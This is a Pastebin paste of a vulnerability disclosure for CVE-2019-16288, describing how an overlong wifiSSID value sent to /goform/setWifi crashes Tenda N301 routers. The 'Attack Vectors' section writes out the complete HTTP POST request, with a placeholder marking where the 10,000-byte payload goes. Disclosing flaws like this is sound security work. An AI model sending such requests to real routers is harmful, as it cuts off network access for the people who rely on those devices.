Guest User

CVE-2019-16288

a guest
Sep 13th, 2019
1,362
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. CVE-2019-16288
  2.  
  3. > [Description]
  4. > On Tenda N301 wireless routers, a long string in the wifiSSID
  5. > parameter of a goform/setWifi POST request causes the device to crash.
  6. >
  7. > ------------------------------------------
  8. >
  9. > [Additional Information]
  10. > injected 10000 byte payload result of denial of service
  11. >
  12. > ------------------------------------------
  13. >
  14. > [VulnerabilityType Other]
  15. > denial of service (total hardware crash!)
  16. >
  17. > ------------------------------------------
  18. >
  19. > [Vendor of Product]
  20. > https://www.tendacn.com/
  21. >
  22. > ------------------------------------------
  23. >
  24. > [Affected Product Code Base]
  25. > Tenda Wireless router - N301
  26. >
  27. > ------------------------------------------
  28. >
  29. > [Affected Component]
  30. > POST /goform/setWifi HTTP/1.1
  31. > "wifiSSID="
  32. >
  33. > ------------------------------------------
  34. >
  35. > [Attack Type]
  36. > Remote
  37. >
  38. > ------------------------------------------
  39. >
  40. > [Impact Denial of Service]
  41. > true
  42. >
  43. > ------------------------------------------
  44. >
  45. > [Attack Vectors]
  46.  
  47. POST /goform/setWifi HTTP/1.1
  48. Host: 192.168.0.1
  49. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
  50. Accept: */*
  51. Accept-Language: hu-HU,hu;q=0.8,en-US;q=0.5,en;q=0.3
  52. Accept-Encoding: gzip, deflate
  53. Content-Type: application/x-www-form-urlencoded;
  54. Content-Length: 423
  55. Connection: close
  56. Referer: http://192.168.0.1/index.html
  57. Cookie: ecos_pw=MDEyMzQ1Njc41qw:language=cn; bLanguage=en
  58.  
  59. module1=wifiEn&wifiEn=true&module2=wifiBasicCfg&wifiSSID=[10000Byte_Payload here!]&wifiSecurityMode=none&wifiPwd=&wifiHideSSID=false&module7=wifiVirSsid&multiWifiEnable=0&multiWifiSSID=Tenda_Extender&multiWifiPwd=12345678&module3=wifiTime&wifiTimeEn=false&wifiTimeClose=00%3A00-07%3A00&wifiTimeDate=01111100&module4=wifiWPS&wpsEn=false&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&module6=wifiPower&wifiPower=high
  60. > ------------------------------------------
  61. >
  62. > [Reference]
  63. > https://www.tendacn.com
  64.  
  65. Use CVE-2019-16288.
RAW Paste Data